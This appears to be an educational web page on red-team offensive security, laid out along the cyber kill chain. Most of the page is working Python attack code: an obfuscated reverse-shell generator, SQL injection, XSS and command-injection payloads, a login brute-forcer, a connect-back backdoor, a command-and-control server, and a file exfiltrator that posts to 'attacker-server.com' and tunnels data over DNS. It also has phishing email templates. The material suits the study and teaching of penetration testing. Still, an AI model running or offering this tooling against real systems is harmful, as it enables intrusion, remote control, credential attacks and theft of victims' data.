Red Team - Offensive Security
Red Team refers to the offensive side of cybersecurity. Red team professionals simulate real-world attacks to test an organization's security defenses, identify vulnerabilities, and help improve overall security posture. They think like attackers to find weaknesses before malicious actors do.
Core Responsibilities
1. Penetration Testing
Authorized simulated attacks to identify security weaknesses.
2. Social Engineering
Testing human vulnerabilities through phishing, pretexting, and other techniques.
3. Vulnerability Assessment
Identifying and exploiting security flaws in systems and applications.
4. Security Research
Discovering new attack vectors and exploitation techniques.
5. Reporting & Remediation Guidance
Documenting findings and providing actionable recommendations.
Attack Lifecycle (Cyber Kill Chain)
1. Reconnaissance
Gathering information about the target.
Example: Information Gathering Script
import socket
import whois
import dns.resolver
import requests
from bs4 import BeautifulSoup
class Reconnaissance:
def __init__(self, target):
self.target = target
self.results = {}
def dns_lookup(self):
"""Perform DNS lookups"""
try:
ip = socket.gethostbyname(self.target)
self.results['ip_address'] = ip
print(f"[+] IP Address: {ip}")
except Exception as e:
print(f"[-] DNS lookup failed: {e}")
def whois_lookup(self):
"""Get WHOIS information"""
try:
w = whois.whois(self.target)
self.results['whois'] = {
'registrar': w.registrar,
'creation_date': w.creation_date,
'expiration_date': w.expiration_date,
'name_servers': w.name_servers
}
print(f"[+] Registrar: {w.registrar}")
print(f"[+] Name Servers: {w.name_servers}")
except Exception as e:
print(f"[-] WHOIS lookup failed: {e}")
def subdomain_enumeration(self):
"""Find subdomains"""
subdomains = ['www', 'mail', 'ftp', 'admin', 'test', 'dev', 'api']
found_subdomains = []
for sub in subdomains:
try:
full_domain = f"{sub}.{self.target}"
socket.gethostbyname(full_domain)
found_subdomains.append(full_domain)
print(f"[+] Found subdomain: {full_domain}")
except:
pass
self.results['subdomains'] = found_subdomains
def port_scan(self, ports=[80, 443, 22, 21, 25, 3306, 8080]):
"""Scan common ports"""
open_ports = []
for port in ports:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
result = sock.connect_ex((self.target, port))
if result == 0:
open_ports.append(port)
print(f"[+] Port {port} is open")
sock.close()
self.results['open_ports'] = open_ports
def web_scraping(self):
"""Extract information from website"""
try:
response = requests.get(f"http://{self.target}", timeout=5)
soup = BeautifulSoup(response.text, 'html.parser')
# Extract emails
emails = set()
for link in soup.find_all('a', href=True):
if 'mailto:' in link['href']:
emails.add(link['href'].replace('mailto:', ''))
# Extract technologies
technologies = []
if soup.find('meta', {'name': 'generator'}):
technologies.append(soup.find('meta', {'name': 'generator'})['content'])
self.results['emails'] = list(emails)
self.results['technologies'] = technologies
print(f"[+] Found {len(emails)} email addresses")
print(f"[+] Technologies: {technologies}")
except Exception as e:
print(f"[-] Web scraping failed: {e}")
def run_recon(self):
"""Run all reconnaissance techniques"""
print(f"\n[*] Starting reconnaissance on {self.target}\n")
self.dns_lookup()
self.whois_lookup()
self.subdomain_enumeration()
self.port_scan()
self.web_scraping()
return self.results
# Usage
# recon = Reconnaissance("example.com")
# results = recon.run_recon()
2. Weaponization
Creating or obtaining exploit tools.
Example: Simple Payload Generator
import base64
class PayloadGenerator:
def __init__(self):
self.payloads = []
def generate_reverse_shell(self, attacker_ip, port):
"""Generate reverse shell payload"""
# Python reverse shell
payload = f"""
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{attacker_ip}",{port}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
"""
encoded = base64.b64encode(payload.encode()).decode()
return f"python -c 'import base64;exec(base64.b64decode(\"{encoded}\"))'"
def generate_sql_injection_payloads(self):
"""Generate SQL injection payloads"""
return [
"' OR '1'='1",
"' OR '1'='1' --",
"' OR '1'='1' /*",
"admin' --",
"' UNION SELECT NULL--",
"' UNION SELECT username, password FROM users--"
]
def generate_xss_payloads(self):
"""Generate XSS payloads"""
return [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg/onload=alert('XSS')>",
"javascript:alert('XSS')",
"<iframe src='javascript:alert(\"XSS\")'>"
]
def obfuscate_payload(self, payload):
"""Obfuscate payload to evade detection"""
# Base64 encoding
encoded = base64.b64encode(payload.encode()).decode()
return f"eval(atob('{encoded}'))"
# Usage
# gen = PayloadGenerator()
# shell = gen.generate_reverse_shell("192.168.1.100", 4444)
# print(shell)
3. Delivery
Transmitting the weapon to the target.
Example: Phishing Email Simulator
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
class PhishingSimulator:
def __init__(self, smtp_server, smtp_port, username, password):
self.smtp_server = smtp_server
self.smtp_port = smtp_port
self.username = username
self.password = password
def create_phishing_email(self, target_email, template='password_reset'):
"""Create phishing email"""
templates = {
'password_reset': {
'subject': 'Urgent: Password Reset Required',
'body': '''
Dear User,
We have detected unusual activity on your account. For security reasons,
you must reset your password immediately.
Click here to reset: http://phishing-test.local/reset
This link will expire in 24 hours.
Best regards,
IT Security Team
'''
},
'invoice': {
'subject': 'Invoice #12345 - Payment Required',
'body': '''
Dear Customer,
Please find attached invoice #12345 for your recent purchase.
View Invoice: http://phishing-test.local/invoice
Payment is due within 7 days.
Regards,
Accounting Department
'''
}
}
msg = MIMEMultipart()
msg['From'] = self.username
msg['To'] = target_email
msg['Subject'] = templates[template]['subject']
body = templates[template]['body']
msg.attach(MIMEText(body, 'plain'))
return msg
def send_test_email(self, target_email, template='password_reset'):
"""Send phishing test email"""
try:
msg = self.create_phishing_email(target_email, template)
server = smtplib.SMTP(self.smtp_server, self.smtp_port)
server.starttls()
server.login(self.username, self.password)
server.send_message(msg)
server.quit()
print(f"[+] Phishing email sent to {target_email}")
return True
except Exception as e:
print(f"[-] Failed to send email: {e}")
return False
def track_clicks(self, user_id):
"""Track if user clicked phishing link"""
# This would be implemented with a web server
# that logs when the phishing link is accessed
pass
# Usage (for authorized testing only!)
# simulator = PhishingSimulator('smtp.example.com', 587, '[email protected]', 'password')
# simulator.send_test_email('[email protected]', 'password_reset')
4. Exploitation
Exploiting vulnerabilities to gain access.
Example: Web Application Exploit
import requests
from urllib.parse import urljoin
class WebExploiter:
def __init__(self, target_url):
self.target_url = target_url
self.session = requests.Session()
def test_sql_injection(self, param='id'):
"""Test for SQL injection vulnerability"""
payloads = [
"1' OR '1'='1",
"1' UNION SELECT NULL,NULL,NULL--",
"1' AND 1=2 UNION SELECT username,password,NULL FROM users--"
]
for payload in payloads:
url = f"{self.target_url}?{param}={payload}"
try:
response = self.session.get(url, timeout=5)
# Check for SQL errors or successful injection
sql_indicators = [
'SQL syntax',
'mysql_fetch',
'ORA-',
'PostgreSQL',
'SQLite'
]
for indicator in sql_indicators:
if indicator.lower() in response.text.lower():
print(f"[+] SQL Injection found with payload: {payload}")
return True
# Check for successful data extraction
if len(response.text) > 1000: # Arbitrary threshold
print(f"[+] Possible data extraction with: {payload}")
except Exception as e:
print(f"[-] Error testing payload: {e}")
return False
def test_command_injection(self, param='cmd'):
"""Test for command injection"""
payloads = [
"; ls -la",
"| whoami",
"`id`",
"$(cat /etc/passwd)"
]
for payload in payloads:
url = f"{self.target_url}?{param}={payload}"
try:
response = self.session.get(url, timeout=5)
# Check for command output
indicators = ['root:', 'uid=', 'total']
for indicator in indicators:
if indicator in response.text:
print(f"[+] Command injection found: {payload}")
return True
except Exception as e:
pass
return False
def test_file_inclusion(self):
"""Test for Local File Inclusion (LFI)"""
payloads = [
"../../../../etc/passwd",
"..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
"....//....//....//etc/passwd"
]
for payload in payloads:
url = f"{self.target_url}?file={payload}"
try:
response = self.session.get(url, timeout=5)
if 'root:' in response.text or 'localhost' in response.text:
print(f"[+] LFI vulnerability found: {payload}")
return True
except Exception as e:
pass
return False
def brute_force_login(self, login_url, username_list, password_list):
"""Brute force login credentials"""
for username in username_list:
for password in password_list:
data = {
'username': username,
'password': password
}
try:
response = self.session.post(login_url, data=data, timeout=5)
# Check for successful login
if 'dashboard' in response.url or 'welcome' in response.text.lower():
print(f"[+] Valid credentials found: {username}:{password}")
return (username, password)
except Exception as e:
pass
return None
# Usage (for authorized testing only!)
# exploiter = WebExploiter("http://vulnerable-site.local")
# exploiter.test_sql_injection()
# exploiter.test_command_injection()
5. Installation
Installing backdoors or maintaining access.
Example: Simple Backdoor
import socket
import subprocess
import os
class Backdoor:
def __init__(self, host, port):
self.host = host
self.port = port
def connect(self):
"""Connect back to attacker"""
try:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host, self.port))
print(f"[+] Connected to {self.host}:{self.port}")
return True
except Exception as e:
print(f"[-] Connection failed: {e}")
return False
def execute_command(self, command):
"""Execute system command"""
try:
output = subprocess.check_output(
command,
shell=True,
stderr=subprocess.STDOUT
)
return output.decode()
except Exception as e:
return f"Error: {str(e)}"
def run(self):
"""Main backdoor loop"""
if not self.connect():
return
while True:
try:
# Receive command
command = self.sock.recv(1024).decode().strip()
if command.lower() == 'exit':
break
# Execute and send result
result = self.execute_command(command)
self.sock.send(result.encode())
except Exception as e:
break
self.sock.close()
# Note: This is for educational purposes only!
# Never use this on systems without authorization
6. Command & Control (C2)
Maintaining communication with compromised systems.
Example: Simple C2 Server
import socket
import threading
class C2Server:
def __init__(self, host='0.0.0.0', port=4444):
self.host = host
self.port = port
self.clients = []
def handle_client(self, client_socket, address):
"""Handle individual client connection"""
print(f"[+] New connection from {address}")
self.clients.append(client_socket)
while True:
try:
# Send command
command = input(f"Shell@{address}> ")
client_socket.send(command.encode())
if command.lower() == 'exit':
break
# Receive output
output = client_socket.recv(4096).decode()
print(output)
except Exception as e:
print(f"[-] Error: {e}")
break
client_socket.close()
self.clients.remove(client_socket)
def start(self):
"""Start C2 server"""
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((self.host, self.port))
server.listen(5)
print(f"[*] C2 Server listening on {self.host}:{self.port}")
while True:
client_socket, address = server.accept()
client_thread = threading.Thread(
target=self.handle_client,
args=(client_socket, address)
)
client_thread.start()
# Usage (for authorized testing only!)
# c2 = C2Server()
# c2.start()
7. Actions on Objectives
Achieving the attack goals (data exfiltration, etc.).
Example: Data Exfiltration
import os
import zipfile
import base64
import requests
class DataExfiltrator:
def __init__(self, exfil_server):
self.exfil_server = exfil_server
def find_sensitive_files(self, directory, extensions=['.txt', '.pdf', '.docx', '.xlsx']):
"""Find potentially sensitive files"""
sensitive_files = []
for root, dirs, files in os.walk(directory):
for file in files:
if any(file.endswith(ext) for ext in extensions):
full_path = os.path.join(root, file)
sensitive_files.append(full_path)
return sensitive_files
def compress_files(self, files, output_zip='data.zip'):
"""Compress files for exfiltration"""
with zipfile.ZipFile(output_zip, 'w', zipfile.ZIP_DEFLATED) as zipf:
for file in files:
try:
zipf.write(file, os.path.basename(file))
except Exception as e:
print(f"[-] Error adding {file}: {e}")
return output_zip
def exfiltrate_http(self, file_path):
"""Exfiltrate data via HTTP"""
try:
with open(file_path, 'rb') as f:
files = {'file': f}
response = requests.post(
f"{self.exfil_server}/upload",
files=files,
timeout=30
)
if response.status_code == 200:
print(f"[+] Successfully exfiltrated {file_path}")
return True
except Exception as e:
print(f"[-] Exfiltration failed: {e}")
return False
def exfiltrate_dns(self, data):
"""Exfiltrate data via DNS queries (covert channel)"""
# Encode data in DNS queries
encoded = base64.b64encode(data.encode()).decode()
chunks = [encoded[i:i+63] for i in range(0, len(encoded), 63)]
for i, chunk in enumerate(chunks):
domain = f"{chunk}.{i}.exfil.attacker.com"
try:
socket.gethostbyname(domain)
except:
pass # DNS query was made, that's what matters
# Usage (for authorized testing only!)
# exfil = DataExfiltrator("http://attacker-server.com")
# files = exfil.find_sensitive_files("/home/user/documents")
# zip_file = exfil.compress_files(files)
# exfil.exfiltrate_http(zip_file)
Red Team Tools
1. Reconnaissance
- Nmap: Network scanner
- Recon-ng: Web reconnaissance framework
- theHarvester: Email and subdomain gathering
- Shodan: Internet-connected device search engine
- Maltego: Link analysis and data mining
2. Exploitation
- Metasploit: Exploitation framework
- Burp Suite: Web application testing
- SQLmap: SQL injection tool
- BeEF: Browser exploitation framework
- Empire: Post-exploitation framework
3. Password Attacks
- John the Ripper: Password cracker
- Hashcat: Advanced password recovery
- Hydra: Network login cracker
- Mimikatz: Windows credential extraction
- CrackMapExec: Network authentication testing
4. Wireless Attacks
- Aircrack-ng: WiFi security testing
- Kismet: Wireless network detector
- Wifite: Automated wireless attack tool
- Reaver: WPS attack tool
5. Social Engineering
- SET (Social Engineering Toolkit): Phishing and social engineering
- Gophish: Phishing campaign framework
- King Phisher: Phishing campaign toolkit
Reporting
Example: Vulnerability Report Template
class VulnerabilityReport:
def __init__(self):
self.findings = []
def add_finding(self, title, severity, description, impact, remediation, cvss_score=None):
"""Add vulnerability finding"""
finding = {
'title': title,
'severity': severity,
'cvss_score': cvss_score,
'description': description,
'impact': impact,
'remediation': remediation,
'evidence': []
}
self.findings.append(finding)
def generate_report(self):
"""Generate vulnerability report"""
report = "="*70 + "\n"
report += "RED TEAM ASSESSMENT REPORT\n"
report += "="*70 + "\n\n"
# Executive Summary
critical = sum(1 for f in self.findings if f['severity'] == 'CRITICAL')
high = sum(1 for f in self.findings if f['severity'] == 'HIGH')
medium = sum(1 for f in self.findings if f['severity'] == 'MEDIUM')
low = sum(1 for f in self.findings if f['severity'] == 'LOW')
report += "EXECUTIVE SUMMARY\n"
report += f"Total Findings: {len(self.findings)}\n"
report += f" Critical: {critical}\n"
report += f" High: {high}\n"
report += f" Medium: {medium}\n"
report += f" Low: {low}\n\n"
# Detailed Findings
report += "DETAILED FINDINGS\n"
report += "="*70 + "\n\n"
for i, finding in enumerate(self.findings, 1):
report += f"{i}. {finding['title']}\n"
report += f" Severity: {finding['severity']}\n"
if finding['cvss_score']:
report += f" CVSS Score: {finding['cvss_score']}\n"
report += f"\n Description:\n {finding['description']}\n"
report += f"\n Impact:\n {finding['impact']}\n"
report += f"\n Remediation:\n {finding['remediation']}\n"
report += "\n" + "-"*70 + "\n\n"
return report
# Usage
# report = VulnerabilityReport()
# report.add_finding(
# title="SQL Injection in Login Form",
# severity="CRITICAL",
# cvss_score=9.8,
# description="The login form is vulnerable to SQL injection...",
# impact="Attacker can bypass authentication and access database...",
# remediation="Use parameterized queries and input validation..."
# )
# print(report.generate_report())
Ethical Guidelines
- Always Get Written Authorization: Never test without explicit permission
- Define Scope Clearly: Know what's in and out of scope
- Minimize Impact: Avoid disrupting business operations
- Protect Data: Handle discovered data responsibly
- Report Responsibly: Disclose findings to the right people
- Follow Laws: Comply with all applicable laws and regulations
- Maintain Confidentiality: Keep findings confidential
- Document Everything: Maintain detailed records of activities
Career Path
- Junior Penetration Tester: Entry-level security testing
- Penetration Tester: Conduct security assessments
- Senior Penetration Tester: Lead complex engagements
- Red Team Operator: Advanced adversary simulation
- Red Team Lead: Manage red team operations
- Security Researcher: Discover new vulnerabilities
- Bug Bounty Hunter: Independent security researcher
Certifications
- CEH: Certified Ethical Hacker
- OSCP: Offensive Security Certified Professional
- GPEN: GIAC Penetration Tester
- GXPN: GIAC Exploit Researcher and Advanced Penetration Tester
- CRTP: Certified Red Team Professional
- PNPT: Practical Network Penetration Tester
DISCLAIMER: All techniques and tools described here are for educational purposes and authorized security testing only. Unauthorized access to computer systems is illegal.
- Go back to Cyber Security
- Return to Home